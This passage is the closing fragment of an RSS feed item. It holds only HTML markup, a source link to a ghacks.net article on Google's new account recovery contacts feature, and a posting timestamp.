</p>

<p>
	 
</p>


<p>
	<a href="https://www.ghacks.net/2025/10/15/google-announces-recovery-contacts-ask-your-friends-and-family-to-help-you-sign-in-to-your-account/" rel="external nofollow">Source</a>
</p>

<hr class="ipsHr">
<p>
	<span style="font-size:12px;"><em>Posted Thursday 16 October 2025 at 3:38 am AEST (my time).</em></span>
</p>

]]></description><guid isPermaLink="false">31896</guid><pubDate>Wed, 15 Oct 2025 17:39:27 +0000</pubDate></item></channel></rss>
